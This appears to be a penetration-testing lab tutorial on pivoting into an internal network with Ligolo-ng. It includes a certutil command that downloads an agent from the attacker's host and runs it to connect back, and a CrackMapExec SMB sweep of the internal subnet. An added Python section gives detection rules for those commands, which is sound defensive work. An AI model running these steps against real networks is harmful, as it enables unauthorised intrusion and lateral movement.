Basic Pivoting
Basic Pivoting with Ligolo-ng
Source:
https://github.com/nicocha30/ligolo-ng
Releases:
https://github.com/nicocha30/ligolo-ng/releases
Step 1: Install Ligolo-ng
Download and Unzip Ligolo-ng: Follow the instructions from the Ligolo-ng GitHub repository to download and unzip the contents.
Step 2: Set Up the Interface
To create the interface for pivoting, you need to add a new TUN/TAP interface and bring it up.
Delete Old Interfaces (if any):
ip route list
route del -net 10.0.0.0/24
Add a New Interface:
ip tuntap add user root mode tun ligolo
ip link set ligolo up
This creates the interface ligolo to route traffic through the tunnel.
Step 3: Get Help with Ligolo-ng
You can always get help or view available options by running:
./proxy -h
Step 4: Start the Proxy Server (Listening)
Start the proxy server with the self-cert option, which will listen for incoming connections:
./proxy -selfcert
Step 5: Move the Agent to the Target Machine
On the target machine, use the following command to download the agent:
certutil -urlcache -f http://192.168.45.241/agent.exe agent.exe
Once the agent is downloaded, run it with the following command:
.\agent.exe -connect 192.168.45.241:11601 -ignore-cert
Here, you are connecting back to your Kali machine. Note: We're using a self-signed certificate, which is why the -ignore-cert option is included.
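From the defender's side, the two commands in this step leave distinctive process command lines. The following is an added example (not part of the original page or of the Ligolo-ng project) that scans process-creation events for them; the host names, the event tuples and the rule names are constructed for illustration.

```python
import re

# Command-line patterns taken from the two commands shown in Step 5.
RULES = {
    "certutil_urlcache_download": re.compile(
        r"\bcertutil(?:\.exe)?\b(?=.*[-/]urlcache\b)(?=.*\bhttps?://)", re.I),
    "tunnel_agent_ignore_cert": re.compile(
        r"(?=.*\s-connect\s+\S+:\d+)(?=.*\s-ignore-cert\b)", re.I),
}
DEFAULT_PORT = "11601"  # listener port used in the agent command above


def classify(cmdline):
    """Return the sorted list of rule names that match one command line."""
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    m = re.search(r"-connect\s+\S+:(\d+)", cmdline, re.I)
    if m and m.group(1) == DEFAULT_PORT:
        hits.append("connect_to_port_11601")
    return sorted(hits)


def scan(events):
    """events: iterable of (host, cmdline). Yield (host, hits) for matches."""
    staged = set()  # hosts that already showed a certutil download
    for host, cmdline in events:
        hits = classify(cmdline)
        if "certutil_urlcache_download" in hits:
            staged.add(host)
        elif "tunnel_agent_ignore_cert" in hits and host in staged:
            hits.append("download_then_tunnel")  # both steps on one host
        if hits:
            yield host, hits


# Constructed sample events (hypothetical hosts WS01/WS02).
SAMPLE = [
    ("WS01", "certutil -hashfile C:\\Temp\\setup.exe SHA256"),
    ("WS02", "certutil -urlcache -f http://192.168.45.241/agent.exe agent.exe"),
    ("WS02", ".\\agent.exe -connect 192.168.45.241:11601 -ignore-cert"),
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE):
        print(host, ", ".join(hits))
```

The benign certutil hash check on WS01 is not flagged; only the -urlcache download and the agent connection on WS02 are, and the second is additionally marked because it follows a download on the same host.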
Step 6: View and Interact with Sessions
To view the active sessions, run the following in the terminal:
sessions
Choose the session by typing its number, for example, '1'. Once you are in the session, run:
ifconfig
This command shows the interfaces on the target machine, including its address on the internal network, such as 10.10.86.141/24.
Step 7: Add Routing to the Pivoting Interface
To route traffic through the tunnel (pivot), you need to add the target network to your routing table.
Add a Route to access the internal network:
ip route add 10.10.86.0/24 dev ligolo
Verify the Route:
You can check if Ligolo has added the route properly with:
ip route list
Step 8: Final Step - Start the Pivoting Session
Now that the route is added, go back to your proxy server, ensure you're in the correct session, and start the proxy.
Select Session:
Choose the correct session by typing the number (e.g., '1').
session
Start Pivoting:
Run the start command to begin the pivot:
start
Step 9: Verify the Pivoting Setup
Now that the pivot is active, you can verify access to the internal network by using CrackMapExec to check whether the internal machines are reachable over SMB.
crackmapexec smb 10.10.86.0/24
If CrackMapExec gets responses from the internal machines, the pivot is successful, and you now have access to the internal network.